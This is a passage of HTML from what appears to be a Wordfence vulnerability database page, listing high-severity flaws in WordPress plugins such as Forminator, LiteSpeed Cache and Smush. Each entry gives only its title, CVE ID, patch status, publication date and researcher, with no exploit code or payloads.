<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/fcae7cb5-d333-4bde-a43b-ea3ef3b023fa" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a669f05d-67c7-45ac-ae56-e7c637ece880" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.0 &#8211; Unauthenticated DOM-Based Cross-Site Scripting via &#8216;error_description&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18328" target="_blank" rel="noopener noreferrer">							CVE-2026-18328						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/eefe3705b8f48b48303d7a95fe7a0ec3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="eefe3705b8f48b48303d7a95fe7a0ec3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adrien-brunner" target="_blank" rel="noopener">Adrien Brunner</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a669f05d-67c7-45ac-ae56-e7c637ece880" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8a0704-1c06-4342-b05a-7bd815a87833" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.0.1 &#8211; Unauthenticated Stored Cross-Site Scripting via Rich-Text Textarea Field</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18324" target="_blank" rel="noopener noreferrer">							CVE-2026-18324						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5f8a0704-1c06-4342-b05a-7bd815a87833" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85b02779-d85f-4700-9994-68391e69c1ea" target="_blank" rel="noopener">Forminator Forms &lt;= 1.57.0.2 &#8211; Unauthenticated Stored Cross-Site Scripting via Radio Field (Save and Continue Draft)</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18323" target="_blank" rel="noopener noreferrer">							CVE-2026-18323						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/forminator" target="_blank" rel="noopener">Forminator Forms – Contact Form, Payment Form &amp; Custom Form Builder</a> <span class="wfvr-software-slug">[forminator]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/85b02779-d85f-4700-9994-68391e69c1ea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/78746454-ba1f-4b1e-8111-1e239100f0be" target="_blank" rel="noopener">JetEngine &lt;= 3.8.14.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81760" target="_blank" rel="noopener noreferrer">							CVE-2026-81760						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-engine" target="_blank" rel="noopener">JetEngine</a> <span class="wfvr-software-slug">[jet-engine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e130f207b6dc84614b81d6d7fd4b475.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e130f207b6dc84614b81d6d7fd4b475"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dutafi" target="_blank" rel="noopener">dutafi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/78746454-ba1f-4b1e-8111-1e239100f0be" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/611074eb-873a-4346-886a-3db61249eafb" target="_blank" rel="noopener">LeadConnector &lt;= 4.0.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81298" target="_blank" rel="noopener noreferrer">							CVE-2026-81298						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leadconnector" target="_blank" rel="noopener">LeadConnector</a> <span class="wfvr-software-slug">[leadconnector]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/611074eb-873a-4346-886a-3db61249eafb" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b045f3d-8412-4e35-b369-2b485639274d" target="_blank" rel="noopener">LiteSpeed Cache &lt;= 7.8.1 &#8211; Unauthenticated Stored Cross-Site Scripting via Comment Content</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-18978" target="_blank" rel="noopener noreferrer">							CVE-2026-18978						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/litespeed-cache" target="_blank" rel="noopener">LiteSpeed Cache</a> <span class="wfvr-software-slug">[litespeed-cache]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd164c6348ca2048a891d26c4106e94a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd164c6348ca2048a891d26c4106e94a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-taylor" target="_blank" rel="noopener">Jack Taylor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0b045f3d-8412-4e35-b369-2b485639274d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c1b1418e-3ec4-479c-b607-1ea394d630fe" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education &lt; 3.7.43 &#8211; Unauthenticated Open Redirect</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81342" target="_blank" rel="noopener noreferrer">							CVE-2026-81342						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/masterstudy-lms-learning-management-system" target="_blank" rel="noopener">MasterStudy LMS WordPress Plugin – for Online Courses and Education</a> <span class="wfvr-software-slug">[masterstudy-lms-learning-management-system]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d8b3fd1db7b2d1617a3592b09f77c3ca.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d8b3fd1db7b2d1617a3592b09f77c3ca"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/abiodun-victor" target="_blank" rel="noopener">Abiodun Victor</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c1b1418e-3ec4-479c-b607-1ea394d630fe" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf1f9ad-8870-43f7-bde0-b00773a9b435" target="_blank" rel="noopener">Music Player for WooCommerce &lt;= 1.8.9 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78283" target="_blank" rel="noopener noreferrer">							CVE-2026-78283						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/music-player-for-woocommerce" target="_blank" rel="noopener">Music Player for WooCommerce</a> <span class="wfvr-software-slug">[music-player-for-woocommerce]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/9cf1f9ad-8870-43f7-bde0-b00773a9b435" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8634a78-e0d3-4e2e-87d8-4277f56511c6" target="_blank" rel="noopener">Optimole &lt;= 4.2.10 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;a&#8217; (above_fold_images) Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-77365" target="_blank" rel="noopener noreferrer">							CVE-2026-77365						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/optimole-wp" target="_blank" rel="noopener">Optimole – Optimize Images | Convert WebP &amp; AVIF | CDN &amp; Lazy Load | Image Optimization</a> <span class="wfvr-software-slug">[optimole-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ed1755942aa6cb7ca0583880be85d3b3.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ed1755942aa6cb7ca0583880be85d3b3"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osvaldo-noe-gonzalez-del-rio" target="_blank" rel="noopener">Osvaldo Noe Gonzalez Del Rio (Os)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b8634a78-e0d3-4e2e-87d8-4277f56511c6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09675029-0204-4692-8280-cdb674fb86df" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate &lt;= 5.4.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78261" target="_blank" rel="noopener noreferrer">							CVE-2026-78261						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 25, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/real-estate-listing-realtyna-wpl" target="_blank" rel="noopener">Realtyna Organic IDX plugin + WPL Real Estate</a> <span class="wfvr-software-slug">[real-estate-listing-realtyna-wpl]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/28bb5e57f2ebf46069c888bd33017ec4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="28bb5e57f2ebf46069c888bd33017ec4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/aydan" target="_blank" rel="noopener">Aydan Arabadzha</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/09675029-0204-4692-8280-cdb674fb86df" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4045d49f-fd12-4906-9e60-97fdb082fe84" target="_blank" rel="noopener">ShopEngine Elementor WooCommerce Builder Addon &lt;= 4.9.4 &#8211; Authenticated (Shop Manager+) Privilege Escalation to WXR Import &#8216;&lt;wp_option&gt;&#8217; Nodes</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75971" target="_blank" rel="noopener noreferrer">							CVE-2026-75971						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/shopengine" target="_blank" rel="noopener">ShopEngine Elementor WooCommerce Builder Addon – All in One WooCommerce Solution with eCommerce Templates &amp; Woo Widgets</a> <span class="wfvr-software-slug">[shopengine]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/4045d49f-fd12-4906-9e60-97fdb082fe84" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f2d4f9d7-9b90-4b9b-98cc-3cf4ca56f20f" target="_blank" rel="noopener">Slider Hero with Video Background, Animation &lt; 9.1.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76789" target="_blank" rel="noopener noreferrer">							CVE-2026-76789						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/slider-hero" target="_blank" rel="noopener">Slider Hero with Video Background, Animation</a> <span class="wfvr-software-slug">[slider-hero]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f2d4f9d7-9b90-4b9b-98cc-3cf4ca56f20f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5898d8fb-a1b3-45a3-9e90-9cc51e42a96d" target="_blank" rel="noopener">Smush – Image Optimization, Compression, Lazy Load, WebP &amp; CDN &lt; 4.3.2 &#8211; Authenticated (Administrator+) Remote Code Execution</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-19223" target="_blank" rel="noopener noreferrer">							CVE-2026-19223						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 27, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-smushit" target="_blank" rel="noopener">Smush – Image Optimization, Compression, Lazy Load, WebP &amp; CDN</a> <span class="wfvr-software-slug">[wp-smushit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/5898d8fb-a1b3-45a3-9e90-9cc51e42a96d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ca648819-1771-405b-bec1-c511427aeea6" target="_blank" rel="noopener">Social Login, Social Sharing by miniOrange &lt;= 7.8.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-82229" target="_blank" rel="noopener noreferrer">							CVE-2026-82229						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Aug 28, 2026</strong>
			</div>
</p></div>
